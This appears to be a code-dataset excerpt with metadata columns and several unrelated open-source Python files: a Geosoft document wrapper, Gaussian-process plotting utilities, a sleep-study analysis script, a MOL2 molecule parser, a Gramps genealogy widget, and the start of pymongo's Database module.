repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
GeosoftInc/gxpy
|
geosoft/gxapi/GXDOCU.py
|
1
|
10991
|
### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXDOCU(gxapi_cy.WrapDOCU):
"""
GXDOCU class.
Class to work with documents
"""
def __init__(self, handle=0):
super(GXDOCU, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXDOCU <geosoft.gxapi.GXDOCU>`
:returns: A null `GXDOCU <geosoft.gxapi.GXDOCU>`
:rtype: GXDOCU
"""
return GXDOCU()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
def copy(self, doc_us):
"""
Copy `GXDOCU <geosoft.gxapi.GXDOCU>`
:param doc_us: Source `GXDOCU <geosoft.gxapi.GXDOCU>`
:type doc_us: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._copy(doc_us)
@classmethod
def create(cls):
"""
Create a document onject
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create(GXContext._get_tls_geo())
return GXDOCU(ret_val)
@classmethod
def create_s(cls, bf):
"""
Create from a serialized source
:param bf: `GXBF <geosoft.gxapi.GXBF>` from which to read `GXDOCU <geosoft.gxapi.GXDOCU>`
:type bf: GXBF
:returns: `GXDOCU <geosoft.gxapi.GXDOCU>` Object
:rtype: GXDOCU
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapDOCU._create_s(GXContext._get_tls_geo(), bf)
return GXDOCU(ret_val)
def get_file(self, file):
"""
Get the document and place in a file.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_file(file.encode())
def get_file_meta(self, file):
"""
Get the document and place in a file with metadata.
:param file: File to which to write document
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If this document is only a URL link, the URL link will
be resolved and the document downloaded from the appropriate
server using the protocol specified.
The document has metadata, and the native document does not
support metadata, the metadata will be placed in an associated
file "filename.extension.GeosoftMeta"
"""
self._get_file_meta(file.encode())
def get_meta(self, meta):
"""
Get the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to fill in with the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_meta(meta)
def doc_name(self, name):
"""
The document name.
:param name: Buffer to fill with document name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._doc_name(name.value.encode())
def file_name(self, name):
"""
The original document file name.
:param name: Buffer to fill with document file name
:type name: str_ref
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
name.value = self._file_name(name.value.encode())
def have_meta(self):
"""
Checks if a document has metadata.
:rtype: bool
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._have_meta()
return ret_val
def is_reference(self):
"""
Is the document only a reference (a URL) ?
:returns: 1 - Yes, 0 - No
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = self._is_reference()
return ret_val
def open(self, mode):
"""
Open a document in the document viewer
:param mode: :ref:`DOCU_OPEN`
:type mode: int
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** On Windows, the default application for the file extension is
used to open the file.
"""
self._open(mode)
def serial(self, bf):
"""
Serialize `GXDOCU <geosoft.gxapi.GXDOCU>`
:param bf: `GXBF <geosoft.gxapi.GXBF>` in which to write object
:type bf: GXBF
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._serial(bf)
def set_file(self, type, name, file):
"""
Set the document from a file source.
:param type: Document type
:param name: Document name, if "" file name will be used
:param file: Document file, must exist
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Document types are normally identified by their extension. If you
leave the document type blank, the extension of the document file
will be used as the document type.
To resolve conflicting types, you can define your own unique type
by entering your own type "extension" string.
The following types are pre-defined (as are any normal Geosoft
file types):
"htm" HTML
"html" HTML
"txt" ASCII text file
"doc" Word for Windows document
"pdf" Adobe PDF
"map" Geosoft map file
"mmap" Mapinfo map file (real extension "map")
"grd" Geosoft grid file
"gdb" Geosoft database
URL Document Links
The document name can be a URL link to the document using one of
the supported protocols. The following protocols are supported:
http://www.mywebserver.com/MyFile.doc - `GXHTTP <geosoft.gxapi.GXHTTP>`
dap://my.dap.server.com/dcs?DatasetName?MyFile.doc - DAP (DAP Document Access)
ftp://my.ftp.server.com/Dir1/MyFile.doc - FTP protocol
The full file name will be stored but no data will be stored with
the `GXDOCU <geosoft.gxapi.GXDOCU>` class and the document can be retrieved using the sGetFile_DOCU
method.
"""
self._set_file(type.encode(), name.encode(), file.encode())
def set_file_meta(self, type, name, file):
"""
Set the document from a file source with metadata.
:param type: Document type extension
:param name: Document name, if NULL use file name
:param file: Document file or URL
:type type: str
:type name: str
:type file: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** See `set_file <geosoft.gxapi.GXDOCU.set_file>`.
This function is the same as sSetFile_DOCU, plus insures that a
`GXMETA <geosoft.gxapi.GXMETA>` exists that includes the "Data" class. If the file has
associated metadata, either supported natively in the file, or
through an associated file "filename.extension.GeosoftMeta",
that metadata will be loaded into the `GXDOCU <geosoft.gxapi.GXDOCU>` meta, and a Data
class will be constructed if one does not exist.
Also, the Document type Extension is very important in that it
specifies the document types that natively have metadata. The
ones currently supported are:
"map" Geosoft map file
"gdb" Geosoft database
"grd" Geosoft grid file
"""
self._set_file_meta(type.encode(), name.encode(), file.encode())
def set_meta(self, meta):
"""
Set the document's meta
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` to add to the document's meta
:type meta: GXMETA
.. versionadded:: 5.1.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._set_meta(meta)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer
|
bsd-2-clause
| 653,045,108,704,022,000
| 27.257069
| 135
| 0.589937
| false
| 3.710668
| false
| false
| false
|
nealegibson/GeePea
|
src/GPUtils.py
|
1
|
6261
|
"""
Some non-core utility functions for GPs
"""
from __future__ import print_function
import numpy as np
import pylab
try:
import dill
dill_available = 'yes'
except ImportError: dill_available = 'no'
####################################################################################################
def load(filename):
"""
Simple function to load a GP from a file using dill
"""
if not dill_available:
# raise ImportError, "dill module not found. can't load gp"
raise ImportError("dill module not found. can't load gp")
else:
file = open(filename,'r')
gp = dill.load(file)
file.close()
return gp
def save(ob,filename):
"""
Simple function to save GP or group to file using dill
"""
if not dill_available:
print("dill module not available. can't save gp")
else:
file = open(filename,'w')
dill.dump(ob,file)
file.close()
def RandomVector(K,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
"""
if m is None: #set mean function if not given
m = np.zeros(K[:,0].size)
return np.random.multivariate_normal(m,K)
def RandVectorFromConditionedGP(K_s,PrecMatrix,K_ss,r,m=None):
"""
Get a random gaussian vector from the covariance matrix K.
m - mean function
calculates conditional covariance K_ss
calculates conditional mean and adds to mean function
"""
#ensure all data are in matrix form
K_s = np.matrix(K_s)
K_ss = np.matrix(K_ss)
PrecMatrix = np.matrix(PrecMatrix)
r = np.matrix(np.array(r).flatten()).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * r
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
K_ss_cond = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
if m is None: #set zero mean function if not given
m = np.zeros(f_s.size)
return RandomVector(K_ss_cond,m=np.array(f_s).flatten()+m)
def PlotRange(ax,x,y,y_err,sigma=1.0,facecolor='0.5',alpha=0.6):
"""
Plot a range 'area' for GP regression given x,y values, y_error and no. sigma
"""
y1,y2 = y+sigma*y_err, y-sigma*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=facecolor,alpha=alpha)
def PlotSigmas(x,y,y_err,nsig=3,color='r',alpha=0.5):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if type(color) is str: #create list
color = [color,]*(nsig+1)
for i in np.arange(-nsig,nsig+1):
pylab.plot(x,y+y_err*i,'-',color=color[np.abs(i)],alpha=alpha,lw=0.5)
def PlotDensity(x,y,yerr,n=200,nsig=5.,cmap='gray_r',sm_x=None,supersamp=None,**kwargs):
#need to resample to a regular spacing
if supersamp is None: supersamp = 1
x_new = np.linspace(x.min(),x.max(),x.size*supersamp)
y = np.interp(x_new,x,y)
yerr = np.interp(x_new,x,yerr)
x = x_new
#set range of y
y_lower,y_upper = (y-nsig*yerr).min(),(y+nsig*yerr).max()
y_range = np.linspace(y_lower,y_upper,n)
#set image extent
x_spacing = x[1]-x[0]
y_spacing = y[1]-y[0]
extent = [x.min()-x_spacing/2.,x.max()+x_spacing/2., y_range[0]-y_spacing/2.,y_range[-1]+y_spacing/2.]
print(y_spacing)
XX,YY = np.meshgrid(x,y_range)
IM = np.exp(-((YY-y)**2 / yerr**2)/2.)
#smooth in x?
if sm_x:
IM = ndimage.gaussian_filter1d(IM, sigma=sm_x, axis=1)
#IM = ndimage.median_filter(IM, footprint=(1,3))
#mask the array below nsig sigma - this allows overlapping transits, and presumably
#lowers file size
MaskedIM = np.ma.masked_where(IM<np.exp(-0.5*nsig**2),IM)
pylab.imshow(MaskedIM, cmap=cmap, aspect='auto', origin='lower', extent=extent, \
vmin=np.exp(-0.5*nsig**2),vmax=1,interpolation='gaussian',alpha=1.0,**kwargs)
return IM
def PlotRanges(x,y,y_err,lc='k',ls='-',title=None,lw=1,lw2=-1,c2='0.8',c1='0.6',alpha=0.8,ax=None):
"""
Plot 1 and 2 sigma range areas for GP regression given x,y values, y_error
"""
if ax==None: ax = pylab.gca()
ax.plot(x, y, color=lc, linewidth=lw, linestyle=ls,alpha=alpha) #plot predictive function and ranges
if lw2 < 0: lw2 = lw/2.
y1,y2 = y+2*y_err, y-2*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c2,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
y1,y2 = y+1*y_err, y-1*y_err
ax.fill_between(x, y1, y2, where=y1>=y2, facecolor=c1,lw=lw2,alpha=alpha)
ax.plot(x,y1,'-',x,y2,'-',color=lc,alpha=alpha,lw=lw2)
#pylab.plot()
if title: pylab.title(title)
def PlotData(x,y,y_err,title=None,fmt='o',ms=4,mfc='0.9',mec='k',ecolor='k',alpha=0.8,capsize=2,ax=None,**kwargs):
"""
Plot the data
"""
if ax==None: ax = pylab.gca()
#ax.errorbar(x,y,yerr=y_err,fmt='ko',fc='r',**kwargs)
ax.errorbar(x,y,yerr=y_err,fmt=fmt,ms=ms,mfc=mfc,mec=mec,ecolor=ecolor,\
alpha=alpha,capsize=capsize,**kwargs)
if title: pylab.title(title)
pylab.plot()
def PlotRange3D(ax,x1_pred,x2_pred,f_pred,f_pred_err,sigma=1.,facecolor=['r','g'],plot_range=True):
"""
Plot a range 'surface' for GP regression given X,f values, f_error and no. sigma
onto 3D axis 'ax'
"""
from matplotlib.mlab import griddata
#create X,Y mesh grid
xi, yi = np.arange(x1_pred.min(),x1_pred.max(),0.1), np.arange(x2_pred.min(),x2_pred.max(),0.1)
X, Y = np.meshgrid(xi, yi)
#use grid data to place (x1_pred, x2_pred, f_pred) values onto Z grid
Z = griddata(x1_pred, x2_pred, f_pred, xi, yi) #grid the predicted data
Z_u = griddata(x1_pred, x2_pred, f_pred+f_pred_err*sigma, xi, yi) #and error data...
Z_d = griddata(x1_pred, x2_pred, f_pred-f_pred_err*sigma, xi, yi)
#plot the surfaces on the axis (must be passed a 3D axis)
ax.plot_wireframe(X,Y,Z,color=facecolor[0],rstride=1,cstride=1)
if plot_range:
ax.plot_wireframe(X,Y,Z_u,color=facecolor[1],rstride=2,cstride=2)
ax.plot_wireframe(X,Y,Z_d,color=facecolor[1],rstride=2,cstride=2)
####################################################################################################
def add_n_par(N):
"""
Simple decorator function to add n_par to a static function - required for built in mean function
"""
def decor(func):
func.n_par = N
return func
return decor
###############################################################################################################
|
gpl-3.0
| -4,645,364,629,243,388,000
| 30.305
| 114
| 0.612362
| false
| 2.68482
| false
| false
| false
|
KHP-Informatics/sleepsight-analytics
|
generate_thesis_outputs.py
|
1
|
5023
|
import numpy as np
from tools import Logger, Participant
import thesis as T
path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/data/'
plot_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/plots/'
log_path = '/Users/Kerz/Documents/projects/SleepSight/ANALYSIS/logs/'
options = {'periodicity': False,
'participant-info': False,
'compliance': False,
'stationarity': False,
'symptom-score-discretisation': False,
'feature-delay': False,
'feature-selection': False,
'non-parametric-svm': False,
'non-parametric-gp': True
}
log = Logger(log_path, 'thesis_outputs.log', printLog=True)
# Load Participants
log.emit('Loading participants...', newRun=True)
aggr = T.Aggregates('.pkl', path, plot_path)
# Export Periodicity tables
if options['periodicity']:
log.emit('Generating PERIODCITY table...')
pt = T.PeriodictyTable(aggr, log)
pt.run()
pt.exportLatexTable(summary=False)
pt.exportLatexTable(summary=True)
# Export Participant Info
if options['participant-info']:
log.emit('Generating PARTICIPANTS-INFO table...')
participantInfo = aggr.getPariticpantsInfo()
features = [
'id',
'gender',
'age',
'durationIllness',
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'Clozapine',
'No.of.Drugs'
]
participantInfoSelect = participantInfo[features]
aggr.exportLatexTable(participantInfoSelect, 'DataParticipantInfo')
# Compliance
if options['compliance']:
log.emit('Generating COMPLIANCE figure and table...')
# Compliance Figure
comp = T.Compliance(aggr, log)
comp.generateFigure(show=False, save=True)
comp.exportLatexTable(save=True)
# Compliance Information Gain
comp = T.Compliance(aggr, log)
comp.normaliseMissingness()
labelsNoMissingness = comp.dfCount.T['No Missingness']
labelsSleep = comp.dfCount.T['sleep']
labelsSymptom = comp.dfCount.T['symptom']
infoTable = aggr.getPariticpantsInfo()
labels = {'Passive data': labelsNoMissingness,
'Active (Sleep Q.)': labelsSleep,
'Active (Symptoms Q.)': labelsSymptom}
features = [
'PANSS.general',
'PANSS.negative',
'PANSS.positive',
'PANSS.total',
'age',
'durationIllness',
'gender',
'Clozapine',
'No.of.Drugs'
]
igTable = T.InfoGainTable(infoTable[features], labels)
igTable.run()
igTable.exportLatexTable(aggr.pathPlot, orderedBy='Passive data', save=True)
# Stationarity results
if options['stationarity']:
log.emit('Generating STATIONARITY table...')
stTable = T.StationaryTable(aggr, log)
stTable.run()
stTable.exportLatexTable(show=False, save=True)
# Symptom Score discretisation
if options['symptom-score-discretisation']:
log.emit('Generating SYMPTOM-SCORE-DISCRETISATION table...')
disTable = T.DiscretisationTable(aggr, log)
disTable.run()
disTable.exportLatexTable(show=False, save=True)
# feature delay
if options['feature-delay']:
log.emit('Generating FEATURE-DELAY table...')
dEval = T.DelayEval(aggr, log)
dEval.generateDelayTable()
dEval.exportLatexTable()
# feature selection with MIFS & mRMR
if options['feature-selection']:
log.emit('Generating FEATURE-SELECTION table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fs.generateFigure(show=True)
# SVM-linear results
if options['non-parametric-svm']:
log.emit('Generating NON-PARAMETRIC-SVM table...')
fs = T.FeatureSelectionEval(aggr, log)
fs.generateHistogramForNTopFeatures(nFeatures=10)
fMifs = []
fMrmr = []
for table in fs.histogramsFs:
if 'MIFS-ADASYN' in table.columns:
fMifs = list(table.index[0:10])
if 'mRMR-ADASYN' in table.columns:
fMrmr = list(table.index[0:10])
totalF = {
'mRMR': {'ADASYN': {'fRank': fMifs}},
'MIFS': {'ADASYN': {'fRank': fMrmr}}
}
results = T.compute_SVM_on_all_participants(aggr, totalF, log)
pTotal = Participant(id=99, path=path)
pTotal.id = 'Total'
pTotal.nonParametricResults = results
aggr.aggregates.append(pTotal)
npEval = T.NonParametricSVMEval(aggr, log)
npEval.logClassificationReports()
npEval.summarise()
npEval.exportLatexTable(show=True)
log.emit('\n{}'.format(np.mean(npEval.summary)), indents=1)
log.emit('\n{}'.format(np.std(npEval.summary)), indents=1)
# GP results
if options['non-parametric-gp']:
gpEval = T.GaussianProcessEval(aggr, log)
gpEval.logClassificationReports()
gpEval.exportLatexTable(mean=False)
gpEval.exportLatexTable(mean=True)
gpEval.plotSummaryGP(plot_path)
|
apache-2.0
| -5,265,038,417,409,206,000
| 31.198718
| 80
| 0.643241
| false
| 3.405424
| false
| false
| false
|
platinhom/CADDHom
|
python/format/HHmol2.py
|
1
|
4222
|
# -*- coding: utf-8 -*-
"""
Created on 2015-10-05
@author: Zhixiong Zhao
"""
import __init__
from HHFormat import *
import molecule.HHMolecule
import molecule.HHAtom
import molecule.HHResidue
import molecule.HHBond
import geometry.HHPoint
Mol=molecule.HHMolecule.Molecule
Atom=molecule.HHAtom.Atom
Res=molecule.HHResidue.Residue
Bond=molecule.HHBond.Bond
Point=geometry.HHPoint.Point
class MOL2(FileFormator):
extension=['mol2'];
def CreateAtomLine(self, atom, lenatom=4, lenres=3):
output=atom.index.rjust(lenatom)+" "+atom.name.ljust(5)
output+=("%.4f" % atom.coordinates.x).rjust(11) + ("%.4f" % atom.coordinates.y).rjust(11)+ ("%.4f" % atom.coordinates.z).rjust(11)+ ' '
output+=atom.atype.ljust(6)+str(atom.resid).rjust(lenres)+ ' ' + atom.resname.ljust(6)+ atom.pcharge.rjust(9)+ os.linesep
return output
def CreateBondline(bond,lenbond=4):
output=bond.index.rjust(lenbond)+" "+bond.idx_bgn.rjust(lenbond)+" "+\
bond.idx_end.rjust(lenbond)+" "+bond.btype.lower().ljust(lenbond)+ os.linesep
return output
def WriteObj(self,obj):
if (isinstance(obj,Atom)):
self.write(CreateAtomLine(obj))
elif(isinstance(obj,Res) or isinstance(obj,Mol)):
for atom in obj.atoms:
self.write(CreateAtomLine(atom))
elif(isinstance(obj,Bond)):
self.write(CreateBondline(obj));
else:
self.write(str(obj));
def ReadAtomLine(self, Line):
items=Line.split()
atom=Atom()
atom.index = int(items[0])
atom.atomid = int(items[0])
atom.name = items[1]
atom.coordinates = Point(float(items[2]), float(items[3]), float(items[4]))
atom.atype=items[5]
#sybyl type
#atom.element_name=atom.atype[0:2].strip('.').strip()
atom.element_name=atom.DeduceElementFromName(atom.name);
if len(items)==9:
atom.resid = int(items[6])
atom.resname = items[7]
atom.charge = items[8]
return atom;
def ReadBondLine(self, Line):
items=Line.split()
bond=Bond()
bond.index = int(items[0])
bond.idx_bgn = int(items[1])
bond.idx_bgn = int(items[2])
bond.btype = items[3]
return bond;
def WriteMolFile(self,mol,filename):
self.open(filename,'w');
self.write("@<TRIPOS>MOLECULE\n")
self.write(mol.name+'\n')
self.write("%5d %5d %5d %5d %5d \n", mol.GetNumAtom(), mol.GetNumBond(), mol.GetNumFrag(), 0, 0);
self.write("@<TRIPOS>ATOM\n");
self.WriteObj(mol);
self.write("@<TRIPOS>BOND\n");
def ReadMolFile(self, filename):
self.open(filename,'r');
findmol=False;
findatom=False;
findbond=False;
nextmol=False;
mols=[]
mol=None
for line in self.handle:
if (line[:17] == "@<TRIPOS>MOLECULE"):
findmol=True;
findatom=False;
findbond=False;
if (nextmol):
mols.append(mol)
nextmol=False;
mol=Mol()
continue;
if (line[:13] == "@<TRIPOS>ATOM"):
findatom=True;
findmol=False;
nextmol=True;
continue;
if (line[:13] == "@<TRIPOS>BOND"):
findatom=False;
findbond=True;
continue;
if (findbond and line[:9]=="@<TRIPOS>"):
findbond=False;
continue;
if (findatom):
atom=self.ReadAtomLine(line);
atom.mol=mol;
mol.atoms.append();
if (findbond):
bond=self.ReadBondLine(line);
bond.mol=mol;
bond.SetAtomsFromIdx()
mol.bonds.append(bond);
mols.append(mol);
self.close();
if (len(mols)==1):return mols[0];
elif (len(mols)>1):return mols;
elif (len(mols)==0):return None;
if __name__=="__main__":
mr=MOL2()
a=mr.ReadMolFile("test.mol2");
print a
print a.atoms[0]
|
gpl-2.0
| 2,584,344,862,297,078,300
| 30.044118
| 143
| 0.541686
| false
| 3.361465
| false
| false
| false
|
ondrokrc/gramps
|
gramps/gui/editors/displaytabs/backreflist.py
|
1
|
4638
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2009-2011 Gary Burton
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Python classes
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# GTK libraries
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# GRAMPS classes
#
#-------------------------------------------------------------------------
from ...widgets import SimpleButton
from .embeddedlist import EmbeddedList, TEXT_COL, MARKUP_COL, ICON_COL
from ...utils import edit_object
#-------------------------------------------------------------------------
#
# BackRefList
#
#-------------------------------------------------------------------------
class BackRefList(EmbeddedList):
_HANDLE_COL = 3
#index = column in model. Value =
# (name, sortcol in model, width, markup/text, weigth_col
_column_names = [
(_('Type'), 0, 100, TEXT_COL, -1, None),
(_('ID'), 1, 75, TEXT_COL, -1, None),
(_('Name'), 2, 250, TEXT_COL, -1, None),
]
def __init__(self, dbstate, uistate, track, obj, refmodel, callback=None):
self.obj = obj
EmbeddedList.__init__(self, dbstate, uistate, track,
_('_References'), refmodel)
self._callback = callback
self.connectid = self.model.connect('row-inserted', self.update_label)
self.track_ref_for_deletion("model")
def update_label(self, *obj):
if self.model.count > 0:
self._set_label()
if self._callback and self.model.count > 1:
self._callback()
def right_click(self, obj, event):
return
def _cleanup_local_connects(self):
self.model.disconnect(self.connectid)
def _cleanup_on_exit(self):
# model may be destroyed already in closing managedwindow
if hasattr(self, 'model'):
self.model.destroy()
def is_empty(self):
return self.model.count == 0
def _create_buttons(self, share=False, move=False, jump=False, top_label=None):
"""
Create a button box consisting of one button: Edit.
This button box is then appended hbox (self).
Method has signature of, and overrides create_buttons from _ButtonTab.py
"""
self.edit_btn = SimpleButton('gtk-edit', self.edit_button_clicked)
self.edit_btn.set_tooltip_text(_('Edit reference'))
hbox = Gtk.Box()
hbox.set_spacing(6)
hbox.pack_start(self.edit_btn, False, True, 0)
hbox.show_all()
self.pack_start(hbox, False, True, 0)
self.add_btn = None
self.del_btn = None
self.track_ref_for_deletion("edit_btn")
self.track_ref_for_deletion("add_btn")
self.track_ref_for_deletion("del_btn")
def _selection_changed(self, obj=None):
if self.dirty_selection:
return
if self.get_selected():
self.edit_btn.set_sensitive(True)
else:
self.edit_btn.set_sensitive(False)
def get_data(self):
return self.obj
def column_order(self):
return ((1, 0), (1, 1), (1, 2))
def find_node(self):
(model, node) = self.selection.get_selected()
try:
return (model.get_value(node, 4), model.get_value(node, 3))
except:
return (None, None)
def edit_button_clicked(self, obj):
(reftype, ref) = self.find_node()
edit_object(self.dbstate, self.uistate, reftype, ref)
|
gpl-2.0
| 2,038,408,885,428,916,200
| 32.854015
| 83
| 0.544631
| false
| 4.061296
| false
| false
| false
|
initNirvana/Easyphotos
|
env/lib/python3.4/site-packages/pymongo/database.py
|
1
|
44607
|
# Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.binary import OLD_UUID_SUBTYPE
from bson.code import Code
from bson.dbref import DBRef
from bson.son import SON
from pymongo import auth, common, helpers
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
OperationFailure)
from pymongo.read_preferences import (modes,
secondary_ok_commands,
ReadPreference)
from pymongo.son_manipulator import SONManipulator
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, connection, name):
"""Get a database by connection and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `connection`: a client instance
- `name`: database name
.. mongodoc:: databases
"""
super(Database,
self).__init__(slave_okay=connection.slave_okay,
read_preference=connection.read_preference,
tag_sets=connection.tag_sets,
secondary_acceptable_latency_ms=(
connection.secondary_acceptable_latency_ms),
safe=connection.safe,
uuidrepresentation=connection.uuid_subtype,
**connection.write_concern)
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if name != '$external':
helpers._check_database_name(name)
self.__name = str(name)
self.__connection = connection
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
Newly added manipulators will be applied before existing ones.
:Parameters:
- `manipulator`: the manipulator to add
"""
base = SONManipulator()
def method_overwritten(instance, method):
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
.. versionadded:: 1.5
"""
return SystemJS(self)
@property
def connection(self):
"""The client instance for this :class:`Database`.
.. versionchanged:: 1.3
``connection`` is now a property rather than a method.
"""
return self.__connection
@property
def name(self):
"""The name of this :class:`Database`.
.. versionchanged:: 1.3
``name`` is now a property rather than a method.
"""
return self.__name
@property
def incoming_manipulators(self):
"""List all incoming SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""List all incoming SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
